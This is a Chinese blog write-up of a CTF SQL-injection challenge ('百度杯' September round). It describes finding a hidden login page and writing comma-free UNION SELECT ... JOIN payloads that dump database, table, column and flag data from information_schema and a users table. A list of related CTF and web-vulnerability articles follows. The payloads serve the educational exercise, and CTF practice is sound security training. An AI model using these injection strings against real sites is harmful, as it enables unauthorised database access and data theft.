百度杯”CTF比赛 九月场 SQLi

最新推荐文章于 2021-04-04 09:08:23 发布
最新推荐文章于 2021-04-04 09:08:23 发布
阅读量744 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43858799/article/details/90346493
版权

1、打开题目 一篇空白 发现一直在loading 还以为是网卡没加载 刷新几遍之后 发现原来都是套路
2、根据提示flag在后台 用bp抓包进行测试

在这里插入图片描述

看到 login.php?id=1 通过URL进行访问
在这里插入图片描述
发现没有什么可以用的信息 再用bp抓包 也灭有可以用信息

最后实在没办法了 看了官方的WP 才知道存在index.php 文件 并在hearder中有提示

通过URL访问之后 bp抓包发现
在这里插入图片描述
两个代码相似 状态码不同 最后对比 发现
在这里插入图片描述
在这里插入图片描述

两者就相差一个字符

把302放入测试中
在这里插入图片描述

仔细观察 可以发现后台的提示
在这里插入图片描述

之后就是常规的SQL注入
在这里插入图片描述

3、在这里插入图片描述
构造错误的闭合 发现与常规闭合不同

再输入 1’ order by 1,2 –
在这里插入图片描述

发现过滤掉了逗号后面的内容 因此网上查到不用逗号 使用join代替的 闭合方式

-1’%20 union select * from (select 1) a join (select 2 ) b %23 在这里插入图片描述

id=-1’%20 union select * from (select database()) a join (select 2 ) b %23
在这里插入图片描述

id=-1’%20 union select * from (select group_concat(table_name) from information_schema.tables where table_schema= database()) a join (select 2 ) b %23 //爆表

在这里插入图片描述

id=-1%27%20%20union%20select%20*%20from%20(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27)%20a%20join%20(select%202%20)%20b%20%23

//爆字段
在这里插入图片描述

id=-1%27%20%20union%20select%20*%20from%20(select%20group_concat(flag_9c861b688330)%20from%20users)%20a%20join%20(select%202%20)%20b%20%23
//爆数据
在这里插入图片描述

提交flag 即可

放羊的弔弔
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
百度CTF比赛二月第三比赛(Reverse专题赛)的CrackMe-1题目
03-30
百度CTF比赛二月第三比赛(Reverse专题赛)的CrackMe-1题目。
SQLi-CTF-master.zip
04-09
CTF(Capture The Flag)是一种网络安全竞赛,参赛者通过解决各种安全挑战来获取积分,而SQLi-CTF通常是指在CTF比赛中涉及SQL注入的特定类型挑战。 在SQL注入攻击中,攻击者可以向应用程序输入恶意的SQL代码,以...
百度CTF比赛 九月 SQLi
feng的博客
09-11 293
这题主要涉及SQL注入的相关知识,涉及的绕过是过滤了逗号后面的语句
百度CTF比赛 九月SQLi(多种姿势)
u011250160的博客
04-04 412
上题 进入网站,发现提示 按照提示访问http://91ad046335104584a1cc3f4e3a83513688ef3757714748d4.changame.ichunqiu.com/login.php?id=1 没有什么有用的信息 使用burpsuite抓包看下 同样没有什么有用的信息 用dirsearch扫下敏感目录 访问robots.txt出现nothing here 访问config.php没有得到信息 访问login.php得到error 访问index.php跳转到开始的load
百度CTF比赛 九月 SQLI
wyj_1216 House
04-06 301
题目来源 i春秋题库 writeup 1、一开始进去,啥都没有,那就查看页面源代码看看吧 发现了login.php?id=1 2、于是,进入到此页面看看 尝试进行注入,发现,并不是真正的注入点。 3、那就一起来找一下注入点吧 这里有个很坑的地方!!! 存在跳转!!! 具体发现方法,我也是拜读了大佬的博客才发现的 注意看上面两张图片, 发现了隐藏起来的关键点:l0gin.php?id=1 ...
百度CTF比赛 九月 SQLi 解题思路
****的博客
10-15 1123
题目简介 题目名称:SQLi 题目内容:后台有获取flag的线索 解题思路 打开地址使用burp抓包发现“l0gin.php?id=1”。 打开“l0gin.php?id=1”地址 使用1’ and ‘1’=‘1(成功)和1’ and ‘1’='2(不成功),说明此处存在sql注入。测试中发现后台过滤了逗号,在这里使用from for代替逗号。 开始注入 猜测数据库名称 猜测数据库名...
# “百度CTF比赛 九月SQLi
sinat_40845893的博客
01-02 198
百度CTF比赛 九月SQLi 数据库注入,无逗号union查询构造 求解流程: 进入题目,页面空白,查看源代码 <html> <head><title>Loading...</title></head> <body> <!-- login.php?id=1 --> </body> </html> 根据提示发送GET请求login.php?id=1 welcome admin~&
从零开始学安全(三十四)●百度 ctf比赛 九月 sqli
weixin_30901729的博客
03-24 49
先扫后台发现 两个可疑登录界面 l0gin.php login.php 猜测是第一个 用bp 抓包发现 index.php 中间有302 重定向 头文件 里面有一个 page=l0gin.php 应该是他了 暗示的很明确了 显示 1 flag 先手动把 习惯手动sql注入 先判断 是数字型还是字符型 1' %23 看出不来 直接 union select 1,2 %23 ok...
百度CTF比赛 九月 SQL
SPS98
11-02 288
先放下参考链接:大方子的WP 还有自己以前写的mysql注入 —— union 平台那边的题目是这样的 很明确说是SQL注入,然后打开容器 很明显是要对id进行注入, 先不着急注入, 把id值变换看看 表面看上去只有两条数据的样子 那就先试下常用操作, 在1后面加个' 没有反应, 应该是出错或者屏蔽报错, 再加个#看看 依旧没反应, 再去掉' 从而可以推测出查询语句应该是sele...
i春秋 “百度CTF比赛 九月 SQLi
include_heqile的博客
09-13 1092
https://www.ichunqiu.com/battalion?t=1&amp;r=0 这道题相当坑爹,我是看了writeup才知道该怎么做 进入题目链接后查看源代码,提示说注入点是login.php,但是这个注入点是假的,累死你也注不出来任何内容,看一下题目链接和点进去之后浏览器搜索框上的链接,两者其实是不一样的: 题目链接:http://bc9dbb2a422b452ca6bcdf...
i春秋 “百度CTF比赛 九月 SQLi writeup
weixin_43442029的博客
01-12 570
0x00 打开题目链接后是一个空白页面,老规矩,去源代码找线索,于是就发现了提示login.php?id=1。 由题目可以知道这一题是SQL注入有关,那url的参数id应该就是注入点了。不过我试了好几次都没有特殊的回显,后来在网上搜到一些提示说真正的页面是l0gin.php。不得不说出题人和解出来的人脑洞是真的大。(不过之后做了一些其他题目后才发现这次比赛的出题人很喜欢这样的命名方式,可能是这样想...
领航 CTF 2021 决赛 真题 7z
12-07
领航 CTF 2021 决赛
中山市香山 2021 CTF zip
12-07
中山市香山 2021 CTF zip
网络安全CTF比赛工具集(整合版)
最新发布
01-04
涵盖在线工具以及其他好用的工具包, 在线工具:导航型站点,CTF大集合。 CTF工具包:包里有CTF相关的各种工具,包括逆向,解密,WEB,密码学等等,相当有用,可以方便地准备各种CTF比赛
远程命令、代码执行RCE漏洞
weixin_43858799的博客
05-13 4297
一、RCE介绍: RCE(remote command/code execute)概述 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界...
反射型XSS,存储型XSS,Dom型XSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录
weixin_43858799的博客
04-22 3005
XSS: 反射型XSS,存储型XSS,Dom型XSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录 一、跨站脚本漏洞(XSS) XSS漏洞一直被评估为web漏洞中危害较大的漏洞 XSS是一种发生在web前端的漏洞,主要危害前端用户 XSS可以通过进行钓鱼攻击,前端js挖矿,用户cookie获取,甚至结合浏览器自身漏洞对主机进行远程控制等 攻击流程图: 危害:存储型>反射型>D...
CSRF漏洞原理,通过csrf进行地址修改实验演示,token详解及常见防范措施
weixin_43858799的博客
05-08 1268
CSRF漏洞原理,通过csrf进行地址修改实验演示,token详解及常见防范措施 一、CSRF漏洞原理 Cross-site request forgery 简称为"CSRF" 在CSRF的攻击景中攻击者会伪造一个请求(这个请求一般是一个链接) 然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击也就完成了 所以CSRF攻击也被称为为“one click”攻击 eg: 如果想要修改luc...
百度CTF比赛 九月 123
weixin_43858799的博客
05-19 1112
1、打开题目 得到一个登录界面 2、ctrl+u 得到作者提示 尝试在URL里访问user.php 发现没有什么反应 则尝试一下user.php.bak .bak后缀的文件 意思是备份文件 基本与源文件相同 访问后 跳出一个下载框 我们下载此文件 打开之后发现 是一些名字 所以把这个文件当作字典 进行爆破 3、我们先随便输入以下用户名和密码 用bp抓包 清除一下变量 模式选...
福建闽盾 ctf比赛题目
08-26
福建闽盾CTF比赛题目是指“福建”和“闽盾”这两个关键词所组成的CTF比赛的题目。CTF(Capture The Flag,夺旗赛)是一种网络安全竞赛,旨在考验选手在网络攻防和信息安全方面的技能。 福建作为一个华南沿海...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值